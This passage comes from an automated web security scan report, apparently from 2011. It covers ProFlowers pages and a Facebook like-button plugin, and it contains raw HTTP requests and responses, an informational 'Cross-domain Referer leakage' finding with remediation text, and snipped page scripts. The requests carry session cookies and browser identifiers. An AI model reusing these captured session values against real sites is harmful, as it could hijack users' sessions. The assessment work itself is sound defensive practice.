s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253APLA7139-8%252522PeaceLily(Sympathy)%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response 1

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f24%2f2011&pid=30003767&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=168084
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:48 GMT
Content-Length: 474

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx?flexShown=False&amp;scAddItem=true&amp;tile=hmpg_podA&amp;trackingpgroup=PBS&amp;op=new&amp;quantity=1&amp;Ref=HomeNoRef&amp;deliveryon=True&amp;deliverydate=5%2f24%2f2011&amp;pid=30003767&amp;ssid=27&amp;COBRAND=pfc&amp;ShowGiftOptions=True&amp;flexChosen=False&amp;selectedrelationshipID=168084">here</a>.</h2>
</body></html>

Request 2

GET /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx?flexShown=False&deliveryon=True&scAddItem=true&flexChosen=False&tile=hmpg_podA&selectedrelationshipID=168084&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5/24/2011&pid=30003767&ssid=27&COBRAND=pfc&trackingpgroup=PBS&ShowGiftOptions=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253APLA7139-8%252522PeaceLily(Sympathy)%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response 2

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.proflowers.com/?tile=hmpg_podA&ssid=27&Ref=HomeNoRef&op=new&COBRAND=pfc
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:21:20 GMT
Content-Length: 215

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.proflowers.com/?tile=hmpg_podA&amp;ssid=27&amp;Ref=HomeNoRef&amp;op=new&amp;COBRAND=pfc">here</a>.</h2>
</body></html>
15.4. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a5dfe874%26origin%3Dhttp%253A%252F%252Fwww.ftd.com%252Ff1fcffb74%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2FFTDFlowers&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.137.43.128
X-Cnection: close
Date: Mon, 09 May 2011 01:00:37 GMT
Content-Length: 8755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<script type="text/javascript">
Env={module:"like_widget",impid:"b3ef0a10",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:375286,vip:"69.63.189.39",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"-rYxz",lhsh:"282ea",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script></head><body class="plugin transparent_widget safari4 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="LikePluginPagelet"><div id="connect_widget_4dc73cb5ab6c99310026140" class="connect_widget button_count" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">42K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_
...[SNIP]...

Request 2

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a5dfe874%26origin%3Dhttp%253A%252F%252Fwww.ftd.com%252Ff1fcffb74%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2FFTDFlowers&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.207.35
X-Cnection: close
Date: Mon, 09 May 2011 01:00:44 GMT
Content-Length: 8735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<script type="text/javascript">
Env={module:"like_widget",impid:"a5f07ac1",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:375286,vip:"69.63.189.39",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"-rYxz",lhsh:"282ea",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script></head><body class="plugin transparent_widget safari4 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="LikePluginPagelet"><div id="connect_widget_4dc73cbc01f5c6569629200" class="connect_widget button_count" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">42K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_
...[SNIP]...
16. Cross-domain Referer leakage  previous  next
There are 32 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

16.1. http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 1453
Content-Type: application/x-javascript
Last-Modified: Thu, 23 Sep 2010 20:40:54 GMT
Accept-Ranges: bytes
ETag: "b1f8519e5f5bcb1:33ff"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:09:21 GMT
Connection: close

// IF AGENTS ARE AVAILABLE:
function agents_available() {
   try {
       document.getElementById('smartbutton').style.display='block';
       document.getElementById('smartbutton').innerHTML = '<a href="" on
...[SNIP]...
er control.
   var scriptDiv = document.getElementById("advanceSmartButtonScript");
   if (scriptDiv != null)
   {
    if (scriptDiv.style.display =='block')
    {
scriptDiv.innerHTML = '<img src="https://admin.instantservice.com/resources/smartbutton/5526/21088/available.gif?'+Math.floor(Math.random()*10001)+'" style="width:0;height:0;visibility:hidden;position:absolute;" onLoad="agents_available()" onError="agents_not_available()">';
    }
   }
}

$().ready(function () {
   enableLiveChat();
});
16.2. http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js?siteversionnumber=2011.05.07.2 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Content-Length: 33609
Content-Type: application/x-javascript
Last-Modified: Wed, 30 Mar 2011 23:33:29 GMT
Accept-Ranges: bytes
ETag: "3470badf32efcb1:33ff"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:09:20 GMT
Connection: close

PRVD.APP.UC.PersonalizationSelection = function (htmlElementID) {
   this.ElementID = htmlElementID;
   this.Element = document.getElementById(this.ElementID);
   this.OnPersonalizationSelectionChangedEv
...[SNIP]...
</div>" +
                   "<a href='http://www.adobe.com/go/getflashplayer/' target='_blank'><img src='http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif' alt='Get Adobe Flash player' /></a>
...[SNIP]...
16.3. https://accounts.proflowers.com/CustomerLogin.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.proflowers.com
Path:   /CustomerLogin.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /CustomerLogin.aspx?Ref=HomeNoRef HTTP/1.1
Host: accounts.proflowers.com
Connection: keep-alive
Referer: https://accounts.proflowers.com/Default.aspx?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=tjb3lzavlroebrfrqg11rbq2; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; domain=.proflowers.com; expires=Mon, 09-May-2061 12:15:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:15:32 GMT
Content-Length: 60636

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_common_old.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_lockdown.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/>


<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<a id="_PartnerHeader_UCHeaderPFC__homeLink" border="0" title="Go to ProFlowers Homepage" href="http://www.proflowers.com/Default.aspx?Ref=HomeNoRef"><img class="PFLogo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="ProFlowers Delivery - Send Flowers, Gifts, and Plants" style="border-width:0px;" /></a>
...[SNIP]...
<a rel="nofollow" class="radioLogo" href="http://www.proflowers.com/radio/default.aspx?Ref=HomeNoRef&amp;how=home" style="display:inline-block;height:90px;width:160px;"><img class="radio_icon" height="90px" width="160px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="ProFlowers on the Radio" style="border-width:0px;" /></a>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
CHeaderPFC_ctl117_submit2" prvdid="productsearchlink" rel="nofollow" type="image" href="http://www.proflowers.com/ProductSearch.aspx?Ref=HomeNoRef" style="display:inline-block;height:18px;width:48px;"><img class="sch_smallGoBottom sch_smallGoBottomAlt" height="18px" width="48px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<div class="consBanner746">
<img border="0" alt="" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//personalcreations/images/PRVD_746x60_6brands_1login.jpg" style="border-width:0px;" />
</div>
...[SNIP]...
<h2>Returning Customer:<img class="consIconTrans" border="0" alt="" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//proplants/images/PRVD_76x30_5brands_1login_onWhite.gif" style="border-width:0px;" /></h2>
...[SNIP]...
&#39;.proflowers.com&#39;, &#39;NTRAccountManagementBanner1&#39;, &#39;NFX&#39;, &#39;:&#39;, &#39;-&#39;, &#39;,&#39;);" href="http://www.netflix.com/?mqso=80026223&amp;trckid=PFAM1" target="_blank"><img id="ctl01_bannerbodycreative" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/NTR_AcctMgt_PFC_712_100.jpg" style="border-width:0px;" /></a>
...[SNIP]...
<div id="PFCfooterRibbonImage"> <img class="Ribbon25Mil" border="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /> </div>
...[SNIP]...
lInput" type="text" value="Enter Your Email Here" id="ctl02_ctl02_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" /><img onclick="SetEmailEntryUrl()" class="sch_smallGo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Sign Up for Email Savings" width="17" height="18" border="0" /></div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<a title="The freshest flowers, guaranteed to last at least 7 days." border="0" href="http://www.proflowers.com/?Ref=HomeNoRef" style="display:inline-block;height:61px;width:124px;"><img class="footerLogo_PFC" height="61px" width="124px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." style="border-width:0px;" /></a>
...[SNIP]...
selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" href="http://www.proplants.com/?Ref=HomeNoRef" style="display:inline-block;height:61px;width:117px;"><img class="footerLogo_PLA" height=61px width=117px class="footerLogo_PLA" height="61px" width="117px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." style="border-width:0px;" /></a> <a title="International flower delivery" border="0" rel="nofollow" href="http://www.proflowers.com/international?Ref=HomeNoRef" style="display:inline-block;height:61px;width:132px;"><img class="footerLogo_PFCint" height=61px width=132px class="footerLogo_PFCint" height="61px" width="132px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" style="border-width:0px;" /></a> <a title="The place for unique and personalized gifts." border="0" rel="nofollow" href="http://www.redenvelope.com/?Ref=HomeNoRef" style="display:inline-block;height:61px;width:156px;"><img class="footerLogo_RED" height=61px width=156px class="footerLogo_RED" height="61px" width="156px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." style="border-width:0px;" /></a> <a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/?Ref=HomeNoRef" style="display:inline-block;height:61px;width:170px;"><img class="footerLogo_CMF" height=61px width=170px class="footerLogo_CMF" height="61px" width="170px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." style="border-width:0px;" /></a><a title="Unique personalized gifts for life...s special occasions." border="0" href="http://www.personalcreations.com/?Ref=HomeNoRef" style="display:inline-block;height:61px;width:179px;"><img class="footerLogo_PCR" height=61px width=179px class="footerLogo_PCR" height="61px" width="179px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." style="border-width:0px;" /></a> <a title="Gourmet hand-dipped berries, cookies and cakes." border="0" href="http://www.berries.com/?Ref=HomeNoRef" style="display:inline-block;height:61px;width:89px;"><img class="footerLogo_SHB" height=61px width=89px class="footerLogo_SHB" height="61px" width="89px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." style="border-width:0px;" /></a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
16.4. https://accounts.proflowers.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.proflowers.com
Path:   /Default.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Default.aspx?tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: accounts.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
